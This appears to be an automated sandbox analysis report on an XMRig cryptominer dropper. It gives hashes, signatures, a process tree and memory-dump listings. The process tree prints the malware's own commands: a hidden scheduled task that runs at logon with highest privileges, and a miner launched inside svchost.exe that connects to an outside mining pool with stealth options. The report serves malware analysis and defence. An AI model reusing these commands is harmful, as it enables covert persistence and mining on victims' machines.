Overview

overview

10

Static

static

3

67654a92f8...a8.exe

windows7-x64

10

67654a92f8...a8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    21s
  • max time network
    112s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 01:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe

  • Size

    2.5MB

  • MD5

    8e23251437fa1dee266f37fb780849df

  • SHA1

    936748a0298a97950b7ce34de64a79074db21eeb

  • SHA256

    67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8

  • SHA512

    46a988454007930915a41467eaec792575d2fc4d3c30e1d4f0287a7d904d6f929235206386cd1cfeb756b84875442a7ff172549d2e209be257782298170e082c

  • SSDEEP

    49152:J846cK0B7PlZRb1aLeb2eIitRSq10qaJF1CQC0Tn:JQcK0hPtpBZIitgT9F1hC4

Score
10/10
xmrigdiscoveryminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 19 IoCs
    miner
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe
    "C:\Users\Admin\AppData\Local\Temp\67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2660
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            PID:1932
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
              6⤵
                PID:1536
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                  7⤵
                    PID:1052
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                      8⤵
                        PID:408
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                          9⤵
                            PID:1372
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                              10⤵
                                PID:2612
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                  11⤵
                                    PID:1788
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                      12⤵
                                        PID:2364
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                          13⤵
                                            PID:2548
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                              14⤵
                                                PID:2084
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                                  15⤵
                                                    PID:2580
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                                      16⤵
                                                        PID:1612
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                                          17⤵
                                                            PID:2592
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                                              18⤵
                                                                PID:320
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                                                  19⤵
                                                                    PID:2840
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                                                      20⤵
                                                                        PID:2764
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\RarSFX0\AHK.rar
                                                                          21⤵
                                                                            PID:2660
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:2844
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "rundll32" /tr "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
                                        3⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2800
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /create /f /sc onlogon /rl highest /tn "rundll32" /tr "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1944
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
                                        3⤵
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:2532
                                        • C:\Users\Admin\AppData\Local\Temp\rundll32.exe
                                          C:\Users\Admin\AppData\Local\Temp\rundll32.exe
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1700
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                            5⤵
                                              PID:1988
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6146704 --pass=myminer --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=10 --cinit-idle-cpu=80 --cinit-stealth
                                              5⤵
                                                PID:1104

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • \??\PIPE\srvsvc
                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                        Download Submit

                                      • \Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
                                        Filesize

                                        2.2MB

                                        MD5

                                        e2f6770cd6b8a5b511f11040a226ef6f

                                        SHA1

                                        5815d379aa8e3fa61173451ae7050ce082839c5f

                                        SHA256

                                        55bf65b6eb3e5132b4716619de626731e38b27dfcf53b69f47beb1634e9403b0

                                        SHA512

                                        db24d848af3f4de9d47962671e0471a494fa343d35ec2ac4a357616b259c3b07b7e1a2422c1d239fad9bde80726d04fa0986a99cc01a814daacd083552d03b5e

                                        Download Submit

                                      • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                        Filesize

                                        7KB

                                        MD5

                                        ede8f46793b04053a664edb7e254e01f

                                        SHA1

                                        3148e8d408a956195e37c0084ffa99b3986aa08c

                                        SHA256

                                        7b0117c87556fa7fd347f9a5cac49c4502279961bd19307953f3c15c57f2e121

                                        SHA512

                                        719aacee2752688f4f9cfd423fdb0508e8b810c7fd28ecf6a4e14b96e828b8e86e1b3fa2754e6a05ccc2adb52dcad7dcca45792815ad07946fcc1dc19290b109

                                        Download Submit

                                      • memory/1104-42-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-40-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-52-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-26-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-34-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-36-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-48-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-53-0x00000000000E0000-0x0000000000100000-memory.dmp

                                        Filesize

                                        128KB

                                        Download

                                      • memory/1104-51-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-50-0x000007FFFFFD8000-0x000007FFFFFD9000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/1104-46-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-60-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-44-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-61-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-32-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-55-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-57-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-58-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-56-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-54-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-38-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-30-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-28-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1104-59-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                        Download

                                      • memory/1700-17-0x000000013FBF0000-0x000000013FE20000-memory.dmp

                                        Filesize

                                        2.2MB

                                        Download

                                      • memory/1988-25-0x000000013FD90000-0x000000013FD96000-memory.dmp

                                        Filesize

                                        24KB

                                        Download

                                      • memory/2844-11-0x000000001BF90000-0x000000001C1A8000-memory.dmp

                                        Filesize

                                        2.1MB

                                        Download

                                      • memory/2844-10-0x000000013F080000-0x000000013F2B0000-memory.dmp

                                        Filesize

                                        2.2MB

                                        Download